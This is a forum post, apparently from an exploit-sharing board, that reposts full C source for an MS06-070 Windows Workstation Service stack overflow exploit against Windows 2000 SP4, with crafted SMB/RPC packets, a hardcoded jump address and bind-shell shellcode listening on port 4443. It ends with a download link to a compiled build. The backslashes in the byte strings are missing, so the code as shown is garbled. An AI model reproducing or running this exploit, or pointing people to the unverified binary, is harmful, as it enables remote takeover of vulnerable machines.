Jump to content
Christian

MS Windows Wkssvc NetrJoinDomain2 Stack Overflow

By Christian, in Exploituri

Recommended Posts

Christian Newbie

Christian

Posted
Posted 

/***************************************************************************

Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit

by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:[url]http://ruder.cdut.net/default.asp[/url]

Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
correct jmp EBX address and fixed exploit output status.

Should work on Windows 2000 Server SP4 (All Languages)


usage:
ms06070 targetip DomainName

notice:
Make sure the DomainName is valid and live,more informations see
[url]http://research.eeye.com/html/advisories/published/AD20061114.html[/url],
cocoruder just research the vulnerability and give the exploit for
Win2000.
****************************************************************************/


#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#include <tchar.h>
#pragma comment(lib, "wsock32.lib")


unsigned char SmbNeg[] =
"x00x00x00x2fxffx53x4dx42x72x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x88x05x00x00x00x00x00x0cx00x02x4ex54"
"x20x4cx4dx20x30x2ex31x32x00";


unsigned char Session_Setup_AndX_Request[]=
"x00x00x00x48xffx53x4dx42x73x00"
"x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00xffxffx88x05x00x00x00x00x0dxffx00x00x00xff"
"xffx02x00x88x05x00x00x00x00x00x00x00x00x00x00x00"
"x00x01x00x00x00x0bx00x00x00x6ex74x00x70x79x73x6d"
"x62x00";


unsigned char TreeConnect_AndX_Request[]=
"x00x00x00x58xffx53x4dx42x75x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08"
"x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00"
"x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f"
"x3fx00";


unsigned char NTCreate_AndX_Request[]=
"x00x00x00x64xffx53x4dx42xa2x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x08x04x0cx00x08x00x01x18xffx00xdexdex00"
"x0ex00x16x00x00x00x00x00x00x00x9fx01x02x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x03x00x00x00x01x00"
"x00x00x40x00x40x00x02x00x00x00x01x11x00x00x5cx00"
"x77x00x6bx00x73x00x73x00x76x00x63x00x00x00";


unsigned char Rpc_Bind_Wkssvc[]=
"x00x00x00x92xffx53x4dx42x25x00"
"x00x00x00x18x01x20x00x00x00x00x00x00x00x00x00x00"
"x00x00x01x08xf0x0bx03x08xf7x4cx10x00x00x48x00x00"
"x04xe0xffx00x00x00x00x00x00x00x00x00x00x00x00x4a"
"x00x48x00x4ax00x02x00x26x00x01x40x4fx00x5cx50x49"
"x50x45x5cx00x05x00x0bx03x10x00x00x00x48x00x00x00"
"x00x00x00x00xd0x16xd0x16x00x00x00x00x01x00x00x00"
"x00x00x01x00x98xd0xffx6bx12xa1x10x36x98x33x46xc3"
"xf8x7ex34x5ax01x00x00x00x04x5dx88x8axebx1cxc9x11"
"x9fxe8x08x00x2bx10x48x60x02x00x00x00";


unsigned char Rpc_NetrJoinDomain2_Header[]=
"x00x00x00xa8xffx53x4dx42x25x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x08x6cx07x00x08xc0x01x10x00x00x54x00x00"
"x00x00x04x00x00x00x00x00x00x00x00x00x00x00x00x54"
"x00x54x00x54x00x02x00x26x00x00x40x65x00x00x5cx00"
"x50x00x49x00x50x00x45x00x5cx00x00x00x00x00x05x00"
"x00x03x10x00x00x00x54x00x00x00x01x00x00x00x3cx00"
"x00x00x00x00"
"x16x00"     //opnum,NetrJoinDomain2
"x30x2ax42x00"
"x0ex00x00x00"
"x00x00x00x00"
"x0ex00x00x00"
"x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x31x00"
"x00x00"
"x10x01x00x00"
"x00x00x00x00"
"x10x01x00x00";


unsigned char Rpc_NetrJoinDomain2_End[]=
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x01x00x00x00";


unsigned char *lpDomainName=NULL;
DWORD   dwDomainNameLen=0;



/* win32_bind -  EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub [url]http://metasploit.com[/url] */
unsigned char shellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe9"
"x59x23xcex83xebxfcxe2xf4x15x33xc8x83x01xa0xdcx31"
"x16x39xa8xa2xcdx7dxa8x8bxd5xd2x5fxcbx91x58xccx45"
"xa6x41xa8x91xc9x58xc8x87x62x6dxa8xcfx07x68xe3x57"
"x45xddxe3xbaxeex98xe9xc3xe8x9bxc8x3axd2x0dx07xe6"
"x9cxbcxa8x91xcdx58xc8xa8x62x55x68x45xb6x45x22x25"
"xeax75xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45"
"xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57xcfx9e"
"x16x8fx45x9dx8fx31x10xfcx81x2ex50xfcxb6x0dxdcx1e"
"x81x92xcex32xd2x09xdcx18xb6xd0xc6xa8x68xb4x2bxcc"
"xbcx33x21x31x39x31xfaxc7x1cxf4x74x31x3fx0ax70x9d"
"xbax0ax60x9dxaax0axdcx1ex8fx31x32x95x8fx0axaax2f"
"x7cx31x87xd4x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6"
"x4dxf4x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87"
"xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9fx5ax99"
"x16x8fx76x31x39x3fx49xaax8fx31x40xa3x60xbcx49x9e"
"xb0x70xefx47x0ex33x67x47x0bx68xe3x3dx43xa7x61xe3"
"x17x1bx0fx5dx64x23x1bx65x42xf2x4bxbcx17xeax35x31"
"x9cx1dxdcx18xb2x0ex71x9fxb8x08x49xcfxb8x08x76x9f"
"x16x89x4bx63x30x5cxedx9dx16x8fx49x31x16x6exdcx1e"
"x62x0exdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91"
"xbaxa6xf5x31x39x59x23xce";


DWORD    fill_len_1 =0x84c;     //fill data
DWORD    fill_len_2 =0x1000;    //fill rubbish data
DWORD    addr_jmp_ebx=0x77F92A9B;   //jmp ebx address,in ntdll.dll
unsigned char  code_jmp8[]=      //jmp 8
"xEBx06x90x90";

unsigned char  *Rpc_NetrJoinDomain2=NULL;
DWORD    dwRpc_NetrJoinDomain2=0;


unsigned char  recvbuff[2048];


void showinfo(void)
{
 printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploitn");
 printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15n");
 printf("page:http://ruder.cdut.net/default.aspnn");
 printf("Code fixed by S A Stevens - 16.11.2006n");
 printf("Should work on Windows 2000 Server SP4 (All Languages)nn");
 printf("usage:n");
 printf("ms06070 targetip DomainNamenn");
 printf("notice:n");
 printf("Make sure the DomainName is valid and live,more informations seen");
 printf("http://research.eeye.com/html/advisories/published/AD20061114.html,n");
 printf("cocoruder just research the vulnerability and give the exploit for Win2000.nnn");

}

void neg ( int s )
{
 char response[1024];

 memset(response,0,sizeof(response));

 send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}



void MakeAttackPacket(char *lpDomainNameStr)
{
 DWORD  j,len,b_flag;



 dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
 lpDomainName=(unsigned char *)malloc(dwDomainNameLen);

 memset(lpDomainName,0,dwDomainNameLen);

MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);

 *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
 *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;

 len=dwDomainNameLen+     //DomainName
 fill_len_1-3*2+      //fill_len_1
 4+         //jmp 8
 4+         //addr jmp ebx
 sizeof(shellcode)-1+    //shellcode
 fill_len_2+       //fill_len_2
 2;         //0x0000

 b_flag=0;
 if (len%2==1)
 {
 len++;
 b_flag=1;
 }


 dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
       len+
       sizeof(Rpc_NetrJoinDomain2_End)-1; //end


 //malloc
 Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
 if (Rpc_NetrJoinDomain2==NULL)
 {
 printf("malloc error!n");
 return;
 }

 //fill nop
 memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);


 j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

 //update para1 length
 *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
 *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;


 //copy header

memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);

 j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

 //copy DomainName
 memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
 j=j+dwDomainNameLen;

 //calculate offset
 j=j+fill_len_1-3*2;

 //jmp 8
 memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
 j=j+4;

 //jmp ebx address
 *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
 j=j+4;

 //copy shellcode
 memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
 j=j+sizeof(shellcode)-1;

 //fill data
 memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
 j=j+fill_len_2;

 //0x0000(NULL)
 if (b_flag==0)
 {
 Rpc_NetrJoinDomain2[j]=0x00;
 Rpc_NetrJoinDomain2[j+1]=0x00;
 j=j+2;
 }
 else if (b_flag==1)
 {
 Rpc_NetrJoinDomain2[j]=0x00;
 Rpc_NetrJoinDomain2[j+1]=0x00;
 Rpc_NetrJoinDomain2[j+2]=0x00;
 j=j+3;
 }


 //copy other parameter

memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);

 j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;


}



void main(int argc,char **argv)
{
 WSADATA    ws;
 struct sockaddr_in server;
   SOCKET    sock;
 DWORD    ret;
 WORD    userid,treeid,fid;


 WSAStartup(MAKEWORD(2,2),&ws);




   sock = socket(AF_INET,SOCK_STREAM,0);
   if(sock<=0)
 {
       return;
 }

   server.sin_family = AF_INET;
   server.sin_addr.s_addr = inet_addr(argv[1]);
   server.sin_port = htons((USHORT)445);

 printf("[+] Connecting %sn",argv[1]);

   ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
 if (ret==-1)
 {
 printf("Connection Error, Port 445 Firewalled?n");
 return;
 }


 neg(sock);

 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

 ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
 if (ret<=0)
 {
 printf("send Session_Setup_AndX_Request error!n");
 return;
 }
 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

 userid=*(WORD *)(recvbuff+0x20);       //get userid


 memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid


 ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
 if (ret<=0)
 {
 printf("send TreeConnect_AndX_Request error!n");
 return;
 }
 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

 treeid=*(WORD *)(recvbuff+0x1c);       //get treeid


 //send NTCreate_AndX_Request
 memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);  //update userid
 memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);  //update treeid


 ret=send(sock,(char
*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
 if (ret<=0)
 {
 printf("send NTCreate_AndX_Request error!n");
 return;
 }
 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);


 fid=*(WORD *)(recvbuff+0x2a);        //get fid


 //rpc bind

 memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
 memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
 memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
 *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);

 ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
 if (ret<=0)
 {
 printf("send Rpc_Bind_Wkssvc error!n");
 return;
 }
 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);


 MakeAttackPacket((char *)argv[2]);


 memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
 memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
 memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
 *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);

 *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58;  //update Total Data Count
 *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58;  //update Data Count
 *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47;  //update Byte Count
 *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58;  //update Frag Length

 ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
 if (ret<=0)
 {
 printf("send Rpc_NetrJoinDomain2 error!n");
 return;
 }

 printf("[+] Sent attack packet successfully, Try telnet on %s:4443?n",argv[1]);

 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);




 closesocket(sock);

}

// milw0rm.com [2006-11-17]

and the compiled version:

http://share.urbanfriends.us/savefile_php/uploads/f783ca4bda.rar

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...